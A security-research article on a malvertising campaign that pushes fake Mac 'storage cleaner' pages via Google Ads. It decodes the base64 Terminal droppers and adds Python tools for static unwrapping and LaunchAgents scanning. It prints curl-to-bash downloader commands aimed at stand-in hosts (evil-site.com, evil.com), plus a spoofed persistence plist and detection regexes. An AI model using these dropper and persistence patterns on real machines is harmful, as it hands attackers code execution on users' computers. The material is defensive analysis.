Imagine searching Google for “mac cleaner” or “clear cache macOS,” clicking a shiny sponsored ad, and, without realizing it, handing the keys to your Mac to an attacker.
Cybersecurity researchers have uncovered a fresh campaign abusing Google Ads to redirect users to malicious pages that mimic Apple’s site.
The pages lure Mac owners with the promise of simple storage fixes, then walk them into executing hidden shell commands that download and run an arbitrary script.

We dug into the active ads, dissected the payloads, and traced the tactics.
Google has been notified, but the ads persist in some regions. This is not amateur hour; it is sophisticated social engineering paired with obfuscated bash payloads that exploit user trust in Google and Apple branding.
How the Ads Hook Victims
The attack starts innocently: queries like “mac cleaner,” “free up space macOS,” or “check Mac storage” trigger sponsored results from seemingly legitimate advertisers.
Click through, and you land on a page styled like apple.com, complete with fake navigation menus (non-clickable, for realism) and urgent prompts like “Check your storage now!” or “Free up disk space fast.”
Two primary landing page flavors dominate:
- Google Apps Script Pages: Links resolve to trusted domains such as script.google.com or business.google.com but redirect to Apps Script /macros/s/…/exec endpoints that host the payload. Examples include long URLs like script.google.com/macros/s/AKfycbzQhmqhKU25-h2eSX09eV2TSXVy_KPdXrE0fMDY4ldvX2xD2-CESEThC4FjAdwF_GjT/exec (with Google ad tracking params such as gclid and gad_source appended).
- Medium Posts: Newer variants point to fake profiles such as profile-apple.medium.com, posing as “Official Apple Support.” A prime example: profile-apple.medium.com/free-up-storage-space-on-mac-fbc94c1e1fde. The profile is brand new (hours old, one follower), with planted comments boosting credibility; the few genuine warnings get buried.
These pages push copy-and-paste instructions for Terminal. Critical warning: do not run them. They are pure social engineering disguised as harmless maintenance.
Payload 1: The Base64-Decoded Downloader (Google Apps Script Variant)
The first payload type masquerades as a “storage cleaner.” Users are told to paste a one-liner into Terminal.
On the surface, it looks benign. Here is the technical teardown:
- echo “Cleaning macOS Storage…”: Pure theater. Prints a reassuring message to lower defenses. No actual cleaning occurs.
- echo ‘…’ | base64 -D: The meat. -D is the decode flag on macOS’s base64 (newer releases also accept -d, as GNU coreutils does). The ‘…’ is a base64 blob hiding a shell command, typically a curl/bash chain. Decoding by itself only prints text, but the one-liner feeds that output straight into the shell, where it becomes a downloader that fetches a remote script.
- echo ‘Installing packages please wait…’: More distraction. Builds false trust while the previous command runs silently.
Full execution flow:
- The decoded text expands to a command along the lines of /bin/bash -c “$(curl -fsSL http://evil-site.com/payload.sh)”.
- curl -fsSL grabs the script quietly (-f fails silently on HTTP errors instead of printing the error page, -s suppresses progress output, -L follows redirects).
- bash executes it with the current user’s privileges; no sudo is needed, but the script gets full shell access as that user.
In effect this is arbitrary code execution: the victim has been talked into running attacker-controlled code, with no exploit required. The downloaded script could install adware, keyloggers, or worse. The quiet curl flags keep the download from printing progress or errors in the Terminal window, so nothing looks wrong to the user. We have seen the same pattern in Linux malware droppers and GitHub supply-chain attacks, where the one-liner is obfuscated to evade scanners.
Payload 2: Nested Command Substitution (Second Google Apps Script Variant)
A close cousin uses deeper nesting for stealth.
Dissection:
- /bin/bash -c “…”: Invokes bash to evaluate the quoted string as a command.
- $(…): Command substitution. Runs the inner command and injects its output as text into the outer command before it executes.
- echo ‘…’ | base64 -d: Decodes another base64 blob; the plaintext carries the download URL.
- curl -fsSL <url> | bash: Not visible in the pasted text, but that is what the decoded blob expands to: download the script and pipe it straight into bash.
Why this obfuscation works for attackers:
- Base64 hides the URL from casual inspection.
- Nesting defeats simple regex filters in sandboxes and ad-review pipelines.
- Command substitution assembles the real command only at run time, so the URL can be rotated per campaign or per victim without changing the visible wrapper.
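To see what the two teardowns above hide, here is an added analysis helper that is not code from the article or from the campaign. It statically unwraps a pasted one-liner, decoding each echo '…' | base64 -D/-d blob (including the $( … ) wrapper of the nested variant) into the text the shell would see, and reports URLs and indicators, without ever executing anything. The two sample commands are constructed here to match the structures described; their blobs encode the article’s placeholder http://evil-site.com/payload.sh, and the trailing | bash glue in the first sample is an assumption about how the decoded text reaches the shell.

```python
"""Statically unwrap the obfuscated macOS one-liners WITHOUT running them.

Added example, not code from the original article or from the campaign.
SAMPLE_1 / SAMPLE_2 are constructed to match the structures the teardown
describes; the base64 blobs encode the article's placeholder URL, and the
`| bash` glue in SAMPLE_1 is an assumption.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# `echo '<blob>' | base64 -D` (macOS) / `-d` / `--decode`, optionally wrapped
# in `$( ... )` command substitution as in the nested variant.
BLOB_RE = re.compile(
    r"""(\$\()?echo\s+(['"])([A-Za-z0-9+/=]{8,})\2\s*\|\s*base64\s+(?:-D|-d|--decode)(?(1)\s*\))"""
)
URL_RE = re.compile(r"""https?://[^\s'"|;)]+""")
INDICATORS = {
    "base64_decode": re.compile(r"base64\s+(?:-D|-d|--decode)\b"),
    "command_subst": re.compile(r"\$\("),
    "bash_dash_c": re.compile(r"(?:/bin/)?bash\s+-c\b"),
    "quiet_curl": re.compile(r"\bcurl\s+-[A-Za-z]*s[A-Za-z]*\b"),  # -s (silent) in a flag cluster
    "pipe_to_shell": re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b"),
}

PAYLOAD_URL = "http://evil-site.com/payload.sh"  # placeholder from the article


def b64(plain: str) -> str:
    return base64.b64encode(plain.encode()).decode()


# Constructed sample 1: the "storage cleaner" whose blob hides a bash -c downloader.
SAMPLE_1 = (
    'echo "Cleaning macOS Storage..." && '
    "echo '%s' | base64 -D | bash && "
    "echo 'Installing packages please wait...'"
) % b64('/bin/bash -c "$(curl -fsSL %s)"' % PAYLOAD_URL)

# Constructed sample 2: nested command substitution; the blob decodes to the
# curl | bash chain that the outer bash -c then runs.
SAMPLE_2 = '/bin/bash -c "$(echo \'%s\' | base64 -d)"' % b64("curl -fsSL %s | bash" % PAYLOAD_URL)


def decode_blob(blob: str) -> Optional[str]:
    """Decode one base64 blob to text, or None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def unwrap(cmd: str, max_depth: int = 5) -> List[str]:
    """Return the command as pasted, then each successively decoded layer.

    Each pass replaces one `echo '<blob>' | base64 -D` expression (or its
    `$( ... )` wrapper) with the plaintext it hides, which is what the shell
    would see at that point. Nothing is executed.
    """
    layers = [cmd]
    for _ in range(max_depth):
        m = BLOB_RE.search(layers[-1])
        if not m:
            break
        plain = decode_blob(m.group(3))
        if plain is None:
            break
        layers.append(layers[-1][: m.start()] + plain + layers[-1][m.end():])
    return layers


def triage(cmd: str) -> Dict[str, object]:
    """Static verdict for a pasted command: decoded layers, URLs and indicators."""
    layers = unwrap(cmd)
    text = "\n".join(layers)  # scan the raw text and every decoded layer
    urls = sorted(set(URL_RE.findall(text)))
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if urls and ({"pipe_to_shell", "bash_dash_c"} & set(hits)):
        verdict = "dropper"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"layers": layers, "urls": urls, "indicators": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in (("sample 1", SAMPLE_1), ("sample 2", SAMPLE_2)):
        result = triage(sample)
        print(f"{label}: {result['verdict']} urls={result['urls']} indicators={result['indicators']}")
        print("  effective command:", result["layers"][-1])
```

The second sample unwraps to /bin/bash -c "curl -fsSL http://evil-site.com/payload.sh | bash", which is the point of the teardown: the pasted text never shows a URL or a pipe into bash, but one decode step does. Because the helper only slices strings, it is safe to run on a real pasted command; it is the decode-but-never-eval discipline an analyst should apply before touching anything from an ad.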
It is equivalent to typing curl evil.com/script | bash without thinking. The risks? The script runs with your user’s permissions and can, for example:
- Exfiltrating ~/.ssh/id_rsa keys.
- Installing persistent malware via launchd plists.
- Adding cron jobs for backdoors.
- Mining crypto with your CPU/GPU.
- Enumerating files via find or mdfind for sensitive data.
There is no visible output, thanks to the flags. On macOS Ventura and Sonoma, SIP keeps the script out of system locations and TCC gates access to Desktop, Documents, Downloads and similar folders, but a user who has just pasted a “cleaner” will likely click Allow on the resulting prompt, and Terminal may already hold Full Disk Access. User-level access is more than enough for chaos.
Medium Variant: Same Poison, Social Proof Twist
The Medium post mirrors the above: identical instructions, fake Apple branding, and a comment section gamed to appear legitimate.
Bots post “This worked great!” while one “skeptic” comment flags malware, but it is drowned out. The profile age (e.g., 11 hours old) screams fake, but ad spend buys top placement. Post-decode, the payload is technically identical to the Apps Script variants. Medium’s lax moderation lets it thrive until reported.
Compromised Ad Accounts: The Supply Chain Angle
The advertisers appear to be hijacked. Google’s Ads Transparency Center reveals mismatches:

- Nathaniel Josue Rodriguez (AR03742598973764927489): Legitimate ads for unrelated domains; malvertising slipped in.
- Aloha Shirt Shop (AR00152784596742701057): Suspicious ad confirmed in the center.
The attackers likely stole credentials or abused API keys. Verified advertiser accounts lend credibility, so Google’s vetting was bypassed via account takeover rather than defeated outright. This is malvertising 101: low cost, high reach.
Technical Defenses and Detection
For users:
- Verify URLs: hover before clicking. A script.google.com/…/exec link behind a “Mac cleaner” ad is a red flag.
- Terminal hygiene: never paste commands from untrusted sources. If you must look at one, capture it into a variable first (type read -r p, then paste) and inspect it with echo "$p" | xxd instead of running it.
- Outbound filtering: the built-in macOS application firewall only filters inbound connections, so use Little Snitch, LuLu, or a pf rule to stop curl and similar tools from reaching unknown destinations.
- Check Activity Monitor for rogue processes after any exposure.

Detection signatures:
- Static: a YARA or grep rule for echo '<base64>' | base64 -D (or -d) chained with curl or piped into bash.
- Network: curl -fsSL fetches to short-lived domains (check VirusTotal for IOCs).
- Endpoint: Look for new launch agents in ~/Library/LaunchAgents.
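The endpoint check above is the one that catches the launchd persistence mentioned earlier, so here is an added scanner for it; it is not code from the article. The heuristics are ours: a user-level agent whose command invokes curl, bash -c, base64 or osascript or points into /tmp or /var/folders; a Label impersonating com.apple.* (Apple’s own agents ship under /System/Library/LaunchAgents, not ~/Library/LaunchAgents); and a plist written within the last 24 hours. build_sample_dir() constructs two fixtures in a temporary directory (one spoofed dropper agent using the article’s placeholder URL, one stale benign agent) so the scan runs offline; on a Mac the main block points it at the real ~/Library/LaunchAgents instead.

```python
"""Scan a LaunchAgents directory for dropper-style persistence.

Added example, not from the original article. The heuristics below are
our own; the fixtures built by build_sample_dir() are constructed and use
the article's placeholder URL http://evil-site.com/payload.sh.
"""
import os
import plistlib
import re
import tempfile
import time
from pathlib import Path
from typing import Dict, List

# Program / argument fragments a curl|bash dropper typically re-arms at login with.
DROPPER_RE = re.compile(
    r"\bcurl\b|\bbash\s+-c\b|base64\s+-[Dd]\b|\bosascript\b|/tmp/|/var/folders/",
    re.IGNORECASE,
)


def assess_agent(plist_path: Path, recent_hours: float = 24) -> List[str]:
    """Return the reasons this launch agent looks suspicious ([] means clean)."""
    try:
        with plist_path.open("rb") as fh:
            plist = plistlib.load(fh)
    except (plistlib.InvalidFileException, ValueError):
        return ["unparseable plist"]
    if not isinstance(plist, dict):
        return ["plist root is not a dictionary"]

    reasons = []
    command = " ".join(str(a) for a in plist.get("ProgramArguments", []))
    if plist.get("Program"):
        command = f"{plist['Program']} {command}"
    if DROPPER_RE.search(command):
        reasons.append(f"dropper-like command: {command.strip()}")
    label = str(plist.get("Label", ""))
    if label.startswith("com.apple."):  # Apple's agents do not live in ~/Library/LaunchAgents
        reasons.append(f"label impersonates Apple: {label}")
    age_hours = (time.time() - plist_path.stat().st_mtime) / 3600
    if age_hours < recent_hours:
        reasons.append(f"written {age_hours:.1f}h ago")
    return reasons


def scan_launch_agents(directory: Path, recent_hours: float = 24) -> Dict[str, List[str]]:
    """Map each flagged plist file name to its reasons; clean agents are omitted."""
    findings: Dict[str, List[str]] = {}
    for path in sorted(Path(directory).glob("*.plist")):
        reasons = assess_agent(path, recent_hours)
        if reasons:
            findings[path.name] = reasons
    return findings


def build_sample_dir() -> Path:
    """Constructed fixtures: one Apple-spoofing dropper agent, one stale benign agent."""
    d = Path(tempfile.mkdtemp(prefix="launchagents_"))
    with (d / "com.apple.storagehelper.plist").open("wb") as fh:
        plistlib.dump({
            "Label": "com.apple.storagehelper",
            "ProgramArguments": ["/bin/bash", "-c",
                                 "curl -fsSL http://evil-site.com/payload.sh | bash"],
            "RunAtLoad": True,
            "KeepAlive": True,
        }, fh)
    benign = d / "com.example.backup.plist"
    with benign.open("wb") as fh:
        plistlib.dump({
            "Label": "com.example.backup",
            "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
            "RunAtLoad": True,
        }, fh)
    month_ago = time.time() - 30 * 86400  # make the benign agent look long-established
    os.utime(benign, (month_ago, month_ago))
    return d


if __name__ == "__main__":
    target = Path.home() / "Library" / "LaunchAgents"
    if not target.is_dir():  # not on macOS: fall back to the constructed fixtures
        target = build_sample_dir()
    for name, reasons in scan_launch_agents(target).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

A recently written plist is only a weak signal on its own (legitimate installers create agents too), so treat the age check as a tie-breaker and read the command line: a user agent that runs bash -c with curl in its arguments has no honest reason to exist.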
For Google: faster takedowns via a blocklist of abused Apps Script URLs, and pre-publication scanning of ad landing pages for base64 blobs and shell patterns.
Broader Implications
This campaign highlights Google Ads as a persistent vector; recent reports put roughly 10% of malvertising as now targeting Macs.
Attackers evolve: tomorrow it will be “AI Mac optimizer” ads. macOS’s Unix roots keep bash droppers evergreen, and XProtect’s signature-based checks lag behind obfuscated payloads.